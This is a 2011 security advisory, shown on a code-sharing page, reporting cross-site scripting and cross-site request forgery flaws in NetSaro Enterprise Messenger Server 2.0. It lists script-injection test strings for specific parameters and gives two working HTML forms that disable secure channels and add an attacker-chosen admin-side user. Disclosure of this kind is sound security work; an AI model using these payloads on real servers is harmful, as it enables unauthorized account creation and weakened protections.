扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 |
=================================================== Secur-I Research Group Security Advisory [ SV-2011-004] =================================================== Title: NetSaro Enterprise Messengerv2.0MultipleVulnerabilities Product: Enterprise Messenger Server Vulnerable version: 2.0(Other versions could also be affected) Fixed version: N/A Impact: Medium Homepage: http://netsaro.com/Downloads.aspx Vulnerability ID: SV-2011-004 Found: 2011-08-26 By: Narendra Shinde Secur-I Research Group http://securview.com/ =================================================== Vendor description: --------------------------- NetSaro enables you to create a private and secure instant messaging network, based on client-server architecture. You can send and receive Message, Voice Message, File or Screenshot or start multi-user Chat Sessions. System access requires a valid User Name and Password. You may want to log messages between your users for auditing purposes. Client user interface integrates smoothly into the desktop. Source:http://netsaro.com/ Vulnerability Information: ----------------------------------- 1) Multiple Cross Site Scripting vulnerabilities Vulnerability Information: ------------------------------------- Class: Improper Neutralization of Input during Web Page Generation('Cross-site Scripting') [CWE-79] Impact: Insertion and Execution of malicious scripts in user browser Remotely Exploitable: Yes Authentication Required: Yes User interaction Required : Yes Vulnerability overview/description: ------------------------------------------------- NetSaro Enterprise Messenger Server v2.0is prone to multiple cross-site scripting vulnerabilities as the user-supplied input received via certainparameters is not properly sanitized. This can be exploited by submitting specially crafted input to the affected software.Successful exploitation could allow the attacker to execute arbitrary script code within the user's browser session in the security context of the targeted site. The attacker could gain access to user's cookies (including authentication cookies), if any, associated with the targeted site, access recently submitted data by the target user via web forms, or take actions on the site masquerading as the target user. a) Non �Persistent Cross Site Scripting URL:http://VulnAppIP:4990/login.nsp Vulnerable Parameter : User Name Demo string used: "></script><script>alert("XSS")</script> URL : http://VulnAppIP:4990/user-search.nsp Vulnerable Parameter : Search box Test string used : "><script>alert("XSS")</script> URL : http://VulnerableAppIP:4990/license-add.nsp Vulnerable parameters :Company , Quantity Test string: �><script>alert(�XSS�)</script> URL:http://VulnAppIP:4990/archive-announcement.nsp?FromUser= "><script>alert("xss")</script> URL: http://VulnAppIP:4990/archive-message.nsp?FromUsers= "><script>alert("xss")</script> b) Persistent Cross Site Scripting URL : http://VulnerableAppIP:4990/department-add.nsp Vulnerable Parameters:Name, Description Test string used:�><img src=0 onerror=alert(0)> URL: http://VulnerableAppIP:4990/user-add.nsp Vulnerable Parameters: User Name, First Name , Last name , Job Title ,Email Test string used: "><script>alert("XSS")</script> URL: http://VulnerableAppIP:4990/department-add.nsp Vulnerable Parameter : Name , Description Test string : �><script>alert(�XSS�)</script> Workaround: ----------------- Properchecks on all user input. For more details please refer: https://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet 2)Multiple CSRF vulnerabilities Vulnerability Information: ------------------------------------ Class: Cross-Site Request Forgery (CSRF) [CWE-352] Impact: Unintentional changes in application. Remotely Exploitable: Yes Authentication Required: No User interaction Required : Yes CVE Name: N/A Vulnerability overview/description: -------------------------------------------------- The NetSaro Enterprise Messenger Server Administration Console application is vulnerable to cross-site request forgery, caused by improper validation of user supplied input by Messenger Server Administration Console. By persuading an authenticated user to visit a malicious website a remote attacker could senda malformed HTTP to editapplications settings. The followingURL's are found to be vulnerable : http://VulnerableAppIP:4990/server-security.nsp http://VulnerableAppIP:4990/server-login.nsp http://VulnerableAppIP:4990/server-offline.nsp http://VulnerableAppIP:4990/server-archive.nsp http://VulnerableAppIP:4990/server-properties.nsp?server=webadmin http://VulnerableAppIP:4990/server-properties.nsp?server=webadmin_ssl http://VulnerableAppIP:4990/server-properties.nsp?server=messenger http://VulnerableAppIP:4990/server-properties.nsp?server=messenger_ssl http://VulnerableAppIP:4990/server-properties.nsp?server=gateway http://VulnerableAppIP:4990/server-properties.nsp?server=gateway_ssl http://VulnerableAppIP:4990/server-edit.nsp?server=webadmin http://VulnerableAppIP:4990/server-edit.nsp?server=webadmin_ssl http://VulnerableAppIP:4990/server-edit.nsp?server=messenger http://VulnerableAppIP:4990/server-edit.nsp?server=messenger_ssl http://VulnerableAppIP:4990/server-edit.nsp?server=gateway http://VulnerableAppIP:4990/server-edit.nsp?server=gateway_ssl http://VulnerableAppIP:4990/user-add.nsp http://VulnerableAppIP:4990/department-add.nsp http://VulnerableAppIP:4990/connection-sendannouncement.nsp Proof of Code(POC) 1: To send Messenger, Gateway and Web administration connections on Unsecured channel. <html> <body> <form action="http://VulnerableAppIP:4990/server-security.nsp" method="post"> <input id="rb101" name="secureWebAdmin" type="hidden" value="false" checked> <input id="rb202" name="secureMessenger" type="hidden" value="false" checked> <input id="rb302" name="secureGateway" type="hidden" value="false" checked> <input type="hidden" name="postback" value="postback"> <input type="submit" name="save" value="Click ME :D"> </form> </body> </html> Proof of Code(POC) 2: To add user in application. <html> <body> <form action="http://VulnerableAppIP:4990/user-add.nsp" method="post"> <input name="username" type="hidden" value="ATTACK"> <input name="firstname" type="hidden" value="ATTACK"></td> <input name="lastname" type="hidden" value="ATTACK"></td> <input type="hidden" name="department" type="hidden" value="_Default"> <input name="jobtitle" type="hidden" value="ATTACKER"></td> <input name="email" type="hidden" value="ATTACKER@ATTACK.com"> <input type="hidden" name="authentication"value="database"> <input name="password" type="hidden" value="PASS"></td> <input name="passwordConfirm" type="hidden" value="PASS"></td> <imputname="account" id="account" value="Enabled"> <input type="hidden" name="postback" value="postback"> <input name="add" type="submit" id="add" value="Click Me :D"> </form> </body> </html> Workaround: ------------------ For more details please refer: https://www.owasp.org/index.php/Cross- Site_Request_Forgery_%28CSRF%29_Prevention_Cheat_Sheet Timeline: --------- Vulnerability Found : 2011-08-28 Reported to Vendor : 2011-08-30 Confirmation from vendor : NO REPLY Public Disclosure : 2011-08-31 Thanks & Regards, Narendra. Confidentiality: This e-mail and any attachments may be confidential and may also be privileged. If you are not an intended named recipient, please notify the sender immediately and do not disclose the contents to another person use it for any purpose, or store or copy the information in any medium. |
体验盒子
